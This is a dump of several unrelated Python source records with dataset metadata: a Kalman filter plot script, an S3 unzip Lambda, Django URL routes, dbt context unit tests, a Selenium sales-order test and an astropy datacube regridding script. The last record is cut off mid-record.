dtype=np.float32)\n for idx_var in range(n_x):\n var = VAR[idx_var]\n f_xu.backward(var, retain_graph=True)\n Ak[idx_var, :] = np.array(xi_torch.grad)\n Bk[idx_var, :] = np.array(ui_torch.grad)\n xi_torch.grad.data.zero_()\n ui_torch.grad.data.zero_()\n Ak = Ak + I_nx\n Ck = C\n\n y_est_pri = Ck @ x_est_pri # y[k|k-1]\n Sk = Ck @ P_pri @ Ck.T + R_kal # Innovation covariance\n Kk = P_pri @ Ck.T @ np.linalg.inv(Sk)\n x_est_post = x_est_pri + Kk @ (yi - y_est_pri) # x[k|k]\n\n P_post = (I_nx - Kk @ Ck) @ P_pri # P[k|k]\n x_est_post_vec[time_idx,:] = x_est_post\n\n f_xu_np = f_xu.clone().data.cpu().numpy()\n x_est_pri = x_est_post + f_xu_np # x[k+1|k] predict step\n x_est_pri = x_est_pri.ravel()\n\n P_pri = Ak @ P_post @ Ak.T + Q_kal # P[k|k-1]\n\n\n\n fig,ax = plt.subplots(4,1,figsize=(20,10), sharex=True)\n ax[0].plot(t[:n_plot], y_noise[:n_plot, 0], 'k', label='Measured')\n ax[0].plot(t[:n_plot], x_est_post_vec[:n_plot, 0], label='Predicted')\n ax[0].plot(t[:n_plot], x[:n_plot, 0], label='True')\n ax[0].set_xlabel(\"Time (s)\")\n ax[0].set_ylabel(\"Position p (m)\")\n ax[0].legend()\n ax[0].grid()\n\n ax[1].plot(t[:n_plot], x[:n_plot, 1], label='True')\n ax[1].plot(t[:n_plot], x_est_post_vec[:n_plot, 1], label='Predicted')\n ax[1].set_xlabel(\"Time (s)\")\n ax[1].set_ylabel(\"Speed v (m/s)\")\n ax[1].legend()\n ax[1].grid()\n\n ax[2].plot(t[:n_plot], y_noise[:n_plot, 1], 'k', label='Measured')\n ax[2].plot(t[:n_plot], x_est_post_vec[:n_plot, 2], label='Predicted')\n ax[2].plot(t[:n_plot], x[:n_plot, 2], label='True')\n ax[2].set_xlabel(\"Time (s)\")\n ax[2].set_ylabel(\"Angle $\\phi$ (rad)\")\n ax[2].legend()\n ax[2].grid()\n\n ax[3].plot(t[:n_plot], x[:n_plot, 3], label='True')\n ax[3].plot(t[:n_plot], x_est_post_vec[:n_plot, 3], label='Predicted')\n ax[3].set_xlabel(\"Time (s)\")\n ax[3].set_ylabel(\"Angular velocity $\\omega$ (rad/s)\")\n ax[3].legend()\n ax[3].grid()\n", "sub_path": "examples/cartpole_example/test/cartpole_ref_kalman_filter.py", "file_name": "cartpole_ref_kalman_filter.py", "file_ext": "py", "file_size_in_byte": 7885, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sys.path.append", "line_number": 7, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.close", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 27, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 28, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 29, "usage_type": "attribute"}, {"api_name": "numpy.copy", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 31, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.random.randn", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 39, "usage_type": "attribute"}, {"api_name": "torchid.ssmodels.CartPoleStateSpaceModel", "line_number": 42, "usage_type": "call"}, {"api_name": "torchid.ssfitter.NeuralStateSpaceSimulator", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 88, "usage_type": "attribute"}, {"api_name": "torch.stack", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 146, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 153, "usage_type": "attribute"}, {"api_name": "numpy.diag", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 155, "usage_type": "attribute"}, {"api_name": "numpy.eye", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 156, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 158, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 159, "usage_type": "attribute"}, {"api_name": "numpy.diag", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 162, "usage_type": "attribute"}, {"api_name": "numpy.eye", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 163, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 175, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 176, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 189, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}]} +{"seq_id": "154428738", "text": "import json\nimport boto3\nfrom io import BytesIO\nimport zipfile\n\ndef lambda_handler(event, context):\n s3_resource = boto3.resource('s3')\n source_bucket = event['Records'][0]['s3']['bucket']['name']\n target_bucket = source_bucket\n key_file = event['Records'][0]['s3']['object']['key']\n\n my_bucket = s3_resource.Bucket(source_bucket)\n\n zip_obj = s3_resource.Object(bucket_name=source_bucket, key=key_file)\n buffer = BytesIO(zip_obj.get()[\"Body\"].read())\n z = zipfile.ZipFile(buffer)\n for filename in z.namelist():\n file_info = z.getinfo(filename)\n try:\n response = s3_resource.meta.client.upload_fileobj(\n z.open(filename),\n Bucket=target_bucket,\n Key=f'{filename}'\n )\n except Exception as e:\n print(e)\n", "sub_path": "lambda.py", "file_name": "lambda.py", "file_ext": "py", "file_size_in_byte": 826, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "boto3.resource", "line_number": 7, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 15, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "124619413", "text": "from django.conf.urls import url\nfrom django.urls import path, include\nfrom . import views\n\nurlpatterns = [\n\n # indexes\n url(r'^$', views.index, name='blog_index'),\n url(r'^category/(?P\\d+)-(?P\\w+)/$', views.category, name='blog_category'),\n\n # archives\n url(r'^archive/(?P\\d{4})/$', views.archive_year, name='blog_archive_year'),\n url(r'^archive/(?P\\d{4})/(?P\\d{2})/$', views.archive_month, name='blog_archive_month'),\n url(r'^archive/(?P\\d{4})/(?P\\d{2})/(?P\\d{2})/$', views.archive_day,\n name='blog_archive_day'),\n\n # details\n url(r'^details/$', views.details,\n name='blog_details'),\n\n # youtube\n url(r'^youtube/$', views.youtube,\n name='blog_youtube'),\n\n # organizations\n url(r'^organizations/$', views.organizations,\n name='blog_organizations'),\n\n # ads_names\n url(r'^ads_names/$', views.ads_names,\n name='blog_ads_names'),\n\n # mail_naming\n url(r'^mail_naming/$', views.mail_naming,\n name='blog_mail_naming'),\n\n url(r'^upload/$', views.upload_file, name='upload'),\n\n url(r'^youtube_parser', views.youtube_parser, name='youtube_parser'),\n]\n", "sub_path": "BafosApp/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1464, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 18, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 22, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 26, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 30, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 34, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 37, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "299914352", "text": "import unittest\nfrom unittest import mock\n\nfrom dbt.contracts.graph.parsed import ParsedModelNode, NodeConfig, DependsOn\nfrom dbt.context import parser, runtime\nfrom dbt.node_types import NodeType\nimport dbt.exceptions\nfrom .mock_adapter import adapter_factory\n\n\nclass TestVar(unittest.TestCase):\n def setUp(self):\n self.model = ParsedModelNode(\n alias='model_one',\n name='model_one',\n database='dbt',\n schema='analytics',\n resource_type=NodeType.Model,\n unique_id='model.root.model_one',\n fqn=['root', 'model_one'],\n package_name='root',\n original_file_path='model_one.sql',\n root_path='/usr/src/app',\n refs=[],\n sources=[],\n depends_on=DependsOn(),\n config=NodeConfig.from_dict({\n 'enabled': True,\n 'materialized': 'view',\n 'persist_docs': {},\n 'post-hook': [],\n 'pre-hook': [],\n 'vars': {},\n 'quoting': {},\n 'column_types': {},\n 'tags': [],\n }),\n tags=[],\n path='model_one.sql',\n raw_sql='',\n description='',\n columns={}\n )\n self.context = mock.MagicMock()\n\n def test_var_default_something(self):\n var = runtime.Var(self.model, self.context, overrides={'foo': 'baz'})\n self.assertEqual(var('foo'), 'baz')\n self.assertEqual(var('foo', 'bar'), 'baz')\n\n def test_var_default_none(self):\n var = runtime.Var(self.model, self.context, overrides={'foo': None})\n self.assertEqual(var('foo'), None)\n self.assertEqual(var('foo', 'bar'), None)\n\n def test_var_not_defined(self):\n var = runtime.Var(self.model, self.context, overrides={})\n\n self.assertEqual(var('foo', 'bar'), 'bar')\n with self.assertRaises(dbt.exceptions.CompilationException):\n var('foo')\n\n def test_parser_var_default_something(self):\n var = parser.Var(self.model, self.context, overrides={'foo': 'baz'})\n self.assertEqual(var('foo'), 'baz')\n self.assertEqual(var('foo', 'bar'), 'baz')\n\n def test_parser_var_default_none(self):\n var = parser.Var(self.model, self.context, overrides={'foo': None})\n self.assertEqual(var('foo'), None)\n self.assertEqual(var('foo', 'bar'), None)\n\n def test_parser_var_not_defined(self):\n # at parse-time, we should not raise if we encounter a missing var\n # that way disabled models don't get parse errors\n var = parser.Var(self.model, self.context, overrides={})\n\n self.assertEqual(var('foo', 'bar'), 'bar')\n self.assertEqual(var('foo'), None)\n\n\nclass TestParseWrapper(unittest.TestCase):\n def setUp(self):\n self.mock_config = mock.MagicMock()\n adapter_class = adapter_factory()\n self.mock_adapter = adapter_class(self.mock_config)\n self.wrapper = parser.DatabaseWrapper(self.mock_adapter)\n self.responder = self.mock_adapter.responder\n\n def test_unwrapped_method(self):\n self.assertEqual(self.wrapper.quote('test_value'), '\"test_value\"')\n self.responder.quote.assert_called_once_with('test_value')\n\n def test_wrapped_method(self):\n found = self.wrapper.get_relation('database', 'schema', 'identifier')\n self.assertEqual(found, None)\n self.responder.get_relation.assert_not_called()\n\n\nclass TestRuntimeWrapper(unittest.TestCase):\n def setUp(self):\n self.mock_config = mock.MagicMock()\n self.mock_config.quoting = {'database': True, 'schema': True, 'identifier': True}\n adapter_class = adapter_factory()\n self.mock_adapter = adapter_class(self.mock_config)\n self.wrapper = runtime.DatabaseWrapper(self.mock_adapter)\n self.responder = self.mock_adapter.responder\n\n def test_unwrapped_method(self):\n # the 'quote' method isn't wrapped, we should get our expected inputs\n self.assertEqual(self.wrapper.quote('test_value'), '\"test_value\"')\n self.responder.quote.assert_called_once_with('test_value')\n\n def test_wrapped_method(self):\n rel = mock.MagicMock()\n rel.matches.return_value = True\n self.responder.list_relations_without_caching.return_value = [rel]\n\n found = self.wrapper.get_relation('database', 'schema', 'identifier')\n\n self.assertEqual(found, rel)\n # it gets called with an information schema relation as the first arg,\n # which is hard to mock.\n self.responder.list_relations_without_caching.assert_called_once_with(\n mock.ANY, 'schema'\n )\n", "sub_path": "test/unit/test_context.py", "file_name": "test_context.py", "file_ext": "py", "file_size_in_byte": 4713, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "unittest.TestCase", "line_number": 11, "usage_type": "attribute"}, {"api_name": "dbt.contracts.graph.parsed.ParsedModelNode", "line_number": 13, "usage_type": "call"}, {"api_name": "dbt.node_types.NodeType.Model", "line_number": 18, "usage_type": "attribute"}, {"api_name": "dbt.node_types.NodeType", "line_number": 18, "usage_type": "name"}, {"api_name": "dbt.contracts.graph.parsed.DependsOn", "line_number": 26, "usage_type": "call"}, {"api_name": "dbt.contracts.graph.parsed.NodeConfig.from_dict", "line_number": 27, "usage_type": "call"}, {"api_name": "dbt.contracts.graph.parsed.NodeConfig", "line_number": 27, "usage_type": "name"}, {"api_name": "unittest.mock.MagicMock", "line_number": 44, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 44, "usage_type": "name"}, {"api_name": "dbt.context.runtime.Var", "line_number": 47, "usage_type": "call"}, {"api_name": "dbt.context.runtime", "line_number": 47, "usage_type": "name"}, {"api_name": "dbt.context.runtime.Var", "line_number": 52, "usage_type": "call"}, {"api_name": "dbt.context.runtime", "line_number": 52, "usage_type": "name"}, {"api_name": "dbt.context.runtime.Var", "line_number": 57, "usage_type": "call"}, {"api_name": "dbt.context.runtime", "line_number": 57, "usage_type": "name"}, {"api_name": "dbt.contracts.graph.parsed.exceptions", "line_number": 60, "usage_type": "attribute"}, {"api_name": "dbt.contracts.graph.parsed", "line_number": 60, "usage_type": "name"}, {"api_name": "dbt.context.parser.Var", "line_number": 64, "usage_type": "call"}, {"api_name": "dbt.context.parser", "line_number": 64, "usage_type": "name"}, {"api_name": "dbt.context.parser.Var", "line_number": 69, "usage_type": "call"}, {"api_name": "dbt.context.parser", "line_number": 69, "usage_type": "name"}, {"api_name": "dbt.context.parser.Var", "line_number": 76, "usage_type": "call"}, {"api_name": "dbt.context.parser", "line_number": 76, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 82, "usage_type": "attribute"}, {"api_name": "unittest.mock.MagicMock", "line_number": 84, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 84, "usage_type": "name"}, {"api_name": "mock_adapter.adapter_factory", "line_number": 85, "usage_type": "call"}, {"api_name": "dbt.context.parser.DatabaseWrapper", "line_number": 87, "usage_type": "call"}, {"api_name": "dbt.context.parser", "line_number": 87, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 100, "usage_type": "attribute"}, {"api_name": "unittest.mock.MagicMock", "line_number": 102, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 102, "usage_type": "name"}, {"api_name": "mock_adapter.adapter_factory", "line_number": 104, "usage_type": "call"}, {"api_name": "dbt.context.runtime.DatabaseWrapper", "line_number": 106, "usage_type": "call"}, {"api_name": "dbt.context.runtime", "line_number": 106, "usage_type": "name"}, {"api_name": "unittest.mock.MagicMock", "line_number": 115, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 115, "usage_type": "name"}, {"api_name": "unittest.mock.ANY", "line_number": 125, "usage_type": "attribute"}, {"api_name": "unittest.mock", "line_number": 125, "usage_type": "name"}]} +{"seq_id": "184701090", "text": "import unittest\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.support.ui import Select\n\nfrom selenium.common.exceptions import NoAlertPresentException\n\nusr =\"kantar\"\npwd = \"fisherman\"\nurl = \"http://zerp6-sandbox:8069/web/webclient/home\"\n\n# Define global var for further validation\nref_num = None\ninvoice_date = None\ncustomer_name = None\n#salesman = None\n\nclass CreatePO(unittest.TestCase):\n \"\"\"\n This is a test case to create a workflow to create a sales order\n partially using the webdriver library\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Set up the necessary dependencies to process the workflow\n \"\"\"\n\n # Create an instance for firefox\n self.driver = webdriver.Firefox()\n # Navigate to the desire openerp web server for testing\n driver = self.driver\n driver.get(url)\n driver.window_handles\n\n #print \"Navigated to the web!!!\"\n\n # Use implicitly wait till the elements get loaded up\n driver.implicitly_wait(2)\n\n # Find the username field and input the login name\n elem = driver.find_element_by_name(\"login\")\n elem.send_keys(usr)\n #print \"Login name is input and sent!!!\"\n\n # Find the password field and input the password\n elem = driver.find_element_by_name(\"password\")\n elem.send_keys(pwd)\n #print \"Login password is input!!!\"\n\n # Find the submit button and click\n driver.find_element_by_name(\"submit\").click()\n #print \"Login info is sent!!!\"\n\n # Use implicitly wait till the DOM gets loaded up\n driver.implicitly_wait(4)\n\n # Find the SALES icon and click it\n driver.find_element_by_xpath(\"/html/body/table/tbody/tr[1]/td/div[2]/table/tbody/tr/td[1]/a\").click()\n # Click the Sales Orders on the left column\n driver.find_element_by_xpath(\"/html/body/table/tbody/tr[2]/td/table/tbody/tr/td[1]/div[2]/div[1]/a[3]/span\").click()\n # Have to let the browser sleep for a while, otherwise it will break\n # implicit and explicit wait do not work here\n time.sleep(2)\n\n\n\n\n def test_so(self):\n \"\"\"\n This function to create a sales order by entering info Customer under\n Sales Order Tab, Product info under Sales Order lines\n \"\"\"\n\n # Define global var to be used in the later function\n global ref_num, invoice_date, customer_name, salesman\n driver = self.driver\n\n # Click Create button to bring up the popup window\n driver.find_element_by_xpath(\"/html/body/table/tbody/tr[2]/td/table/tbody/tr/td[2]/div/div/table/tbody/tr[2]/td[1]/div[4]/div/table/thead/tr[1]/th/table/tbody/tr/td/button[1]\").click()\n #print \"Navigate to create sales order page!!!\"\n\n driver.implicitly_wait(4)\n # Choose Customer in the Sales Order Tab\n driver.find_element_by_css_selector(\"span.oe-m2o-drop-down-button > img\").click()\n # Choose 1ST CHOICE AV as a customer\n driver.find_element_by_xpath(\"/html/body/ul[3]/li[2]/a\").click()\n\n # Disable the popup windows. Since this popup window is part\n # of the page, we will just use the unique identifier to\n # close the window\n driver.find_element_by_css_selector(\"span.ui-icon-closethick\").click()\n\n driver.implicitly_wait(4)\n # Get the Order Ref, Date, Customer Name for later validation\n ref = driver.find_element_by_xpath(\"/html/body/table/tbody/tr[2]/td/table/tbody/tr/td[2]/div/div/table/tbody/tr[2]/td[1]/div[5]/div/table/tbody/tr[1]/td/table/tbody/tr/td[1]/table/tbody/tr[1]/td[2]/input\")\n ref_num = ref.get_attribute(\"value\")\n date = driver.find_element_by_xpath(\"/html/body/table/tbody/tr[2]/td/table/tbody/tr/td[2]/div/div/table/tbody/tr[2]/td[1]/div[5]/div/table/tbody/tr[1]/td/table/tbody/tr/td[1]/table/tbody/tr[1]/td[4]/div[2]/input[2]\")\n invoice_date = date.get_attribute(\"value\")\n customer = driver.find_element_by_xpath(\"/html/body/table/tbody/tr[2]/td/table/tbody/tr/td[2]/div/div/table/tbody/tr[2]/td[1]/div[5]/div/table/tbody/tr[2]/td/div[1]/table/tbody/tr[1]/td[2]/table/tbody/tr/td[1]/input\")\n customer_name = customer.get_attribute(\"value\")\n\n\n # Wait till the element loads up\n driver.implicitly_wait(4)\n\n # Click create button in Sales Order Lines section\n driver.find_element_by_xpath(\"/html/body/table/tbody/tr[2]/td/table/tbody/tr/td[2]/div/div/table/tbody/tr[2]/td[1]/div[5]/div/table/tbody/tr[2]/td/div[1]/table/tbody/tr[6]/td/table/tbody/tr/td[1]/div[2]/div/table/thead/tr[1]/th/table/tbody/tr/td/button\").click()\n\n driver.implicitly_wait(4)\n # Click product dropdown field\n driver.find_element_by_xpath(\"(//img[contains(@src,'http://zerp6-sandbox:8069/web/static/src/img/down-arrow.png')])[9]\").click()\n driver.implicitly_wait(1)\n # Choose [0008] Potentiometer, 10K, straight, threaded\n driver.find_element_by_xpath(\"/html/body/ul[11]/li[1]/a\").click()\n\n driver.implicitly_wait(2)\n # Click Save & Close\n #driver.find_element_by_xpath(\"/html/body/div[12]/div[2]/div/div/div/div[1]/button[2]\").click()\n driver.find_element_by_css_selector(\".oe_selectcreatepopup-form-save\").click()\n\n driver.implicitly_wait(1)\n # Finally click save to finish the order\n driver.find_element_by_css_selector(\".oe_form_button_save\").click()\n #print \"SO is created and saved!!!\"\n\n\n #print ref_num, invoice_date, customer_name, usr.title()\n\n # Find the SALES icon and click it\n driver.find_element_by_xpath(\"/html/body/table/tbody/tr[1]/td/div[2]/table/tbody/tr/td[1]/a\").click()\n # Click the Sales Orders on the left column\n driver.find_element_by_xpath(\"/html/body/table/tbody/tr[2]/td/table/tbody/tr/td[1]/div[2]/div[1]/a[3]/span\").click()\n\n driver.implicitly_wait(4)\n # Check the SO number is presented in the first row of the list\n try: self.assertEqual(ref_num, driver.find_element_by_css_selector(\"td.oe-field-cell\").text)\n except AssertionError as e: self.verificationErrors.append(str(e))\n\n # Check the invoice date is the current one\n try: self.assertEqual(invoice_date, driver.find_element_by_xpath(\"/html/body/table/tbody/tr[2]/td/table/tbody/tr/td[2]/div/div/table/tbody/tr[2]/td[1]/div[4]/div/table/tbody/tr[1]/td[3]\").text)\n except AssertionError as e: self.verificationErrors.append(str(e))\n\n # Check the customer is the same as the one we just created\n try: self.assertEqual(customer_name, driver.find_element_by_xpath(\"/html/body/table/tbody/tr[2]/td/table/tbody/tr/td[2]/div/div/table/tbody/tr[2]/td[1]/div[4]/div/table/tbody/tr[1]/td[4]\").text)\n except AssertionError as e: self.verificationErrors.append(str(e))\n\n\n\n def tearDown(self):\n \"\"\"\n Shut down the FF driver\n \"\"\"\n self.driver.close()\n\nif __name__ == \"__main__\":\n unittest.main()\n self.assertTrue(self.is_order_present(By.TAG_NAME, \"body\"))", "sub_path": "web/create_so.py", "file_name": "create_so.py", "file_ext": "py", "file_size_in_byte": 7320, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "unittest.TestCase", "line_number": 23, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 35, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 35, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 69, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 162, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 163, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 163, "usage_type": "name"}]} +{"seq_id": "53556666", "text": "import numpy as np\nfrom astropy.io import fits\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom astropy.io.fits import getheader\nfrom scipy.interpolate import griddata\nfrom copy import copy\n\"\"\"\n\n# To regrid by simply dividing the pixels in halves keeping the same values\n\ndef halfbin_regrid(array):\n '''\n function to regrid an array to\n half the bin size with no interpolation\n at all\n '''\n\n outKsz1=array.shape[0]*2\n outKsz2=array.shape[1]*2\n newarray=np.zeros((outKsz1,outKsz2))\n for i in range(newarray.shape[0]):\n for j in range(newarray.shape[1]):\n newarray[i,j]=array[np.int(np.round((i-0.5)/2.)),np.int(np.round((j-0.5)/2.))]\n\n return newarray\n\ndef halfbin_regrid_cube(cube,flux=False):\n '''\n function to regrid a cube to\n half the bin size with no interpolation\n at all\n '''\n cube2=cube.tolist()\n for i in range(len(cube)):\n\n cube2[i]=halfbin_regrid(cube[i].copy())\n if flux==True:\n \t cube2[i]=cube2[i]*np.sum(cube[i])/np.sum(cube2[i])\n\n cube2=np.array(cube2)\n\n return cube2\n\npath = \"/Users/jespejosalcedo/Dropbox/PhD/My_AM_code/Gaussian_fit/COS4_08515\"\n\n#load the KMOS3D datacube\nkmos_02 = fits.open(f\"{path}/COS4_08515_K.fits\")[1].data\nkmos_02[np.isnan(kmos_02)] = 0\n\n#kmos_005 = fits.open(f\"{path}/COS4_08515_005.fits\")[0].data\n\n#regrid the cube, with *rough* flux conservation\nkmos_01 = halfbin_regrid_cube(kmos_02.copy(),flux=False) # Regrid to 0.1\"/pix\nkmos_005 = halfbin_regrid_cube(kmos_01.copy(),flux=False) # Regrid to 0.05\"/pix\n\nhdr = fits.Header()\nhdr = getheader(f\"{path}/COS4_08515_K.fits\",1)\nhduprim = fits.PrimaryHDU(data=kmos_005,header=hdr)\nhdul = fits.HDUList([hduprim])\nhdul.writeto(f'{path}/COS4_08515_005.fits', overwrite=True)\n\"\"\"\n\n# To regrid by using cubic scpline interpolation on the datacube\n\npath = \"/Users/jespejosalcedo/Dropbox/PhD/My_AM_code/Gaussian_fit/GS4_29868\"\n\n#load the KMOS3D datacube\nkmos_02 = fits.open(f\"{path}/GS4_29868_K.fits\")[1].data\nkmos_02[np.isnan(kmos_02)] = 0\n\ntrial = kmos_02[682]\n\nprint(trial.shape)\n\nx = np.linspace(0,trial.shape[1],trial.shape[1])\ny = np.linspace(0,trial.shape[0],trial.shape[0])\nX, Y = np.meshgrid(x,y)\n\nprint(X.shape)\nprint(Y.shape)\n\nx = np.linspace(0,trial.shape[1],4*trial.shape[1])\ny = np.linspace(0,trial.shape[0],4*trial.shape[0])\nXi, Yi = np.meshgrid(x,y)\n\nprint(Xi.shape)\nprint(Yi.shape)\n\nkmos_005 = np.empty([len(kmos_02),4*trial.shape[0],4*trial.shape[1]])\nprint(kmos_005.shape)\nfor i in range(len(kmos_02)):\n kmos_005[i] = griddata((X.ravel(),Y.ravel()),kmos_02[i].ravel(), (Xi, Yi), method='cubic')\n\ngrid_z2 = griddata((X.ravel(),Y.ravel()),trial.ravel(), (Xi, Yi), method='cubic')\n\nfig, (ax1,ax2) = plt.subplots(figsize=(8,4),ncols=2)\n\nplot = ax1.imshow(trial, cmap=mpl.cm.RdYlBu_r, interpolation='none', origin='lower')\nfig.colorbar(plot, ax=ax1)\n\nplot = ax2.imshow(grid_z2, cmap=mpl.cm.RdYlBu_r, interpolation='none', origin='lower')\nfig.colorbar(plot, ax=ax2)\nplt.show()\n\nhdr = fits.Header()\nhdr = getheader(f\"{path}/GS4_29868_K.fits\",1)\nhduprim = fits.PrimaryHDU(data=kmos_005,header=hdr)\nhdul = fits.HDUList([hduprim])\nhdul.writeto(f'{path}/GS4_29868_005.fits', overwrite=True)\n", "sub_path": "Gaussian_fit/GS4_29868/regrid_cubes_full.py", "file_name": "regrid_cubes_full.py", "file_ext": "py", "file_size_in_byte": 3218, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "astropy.io.fits.open", "line_number": 69, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 69, "usage_type": "name"}, {"api_name": "numpy.isnan", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 83, "usage_type": "call"}, {"api_name": 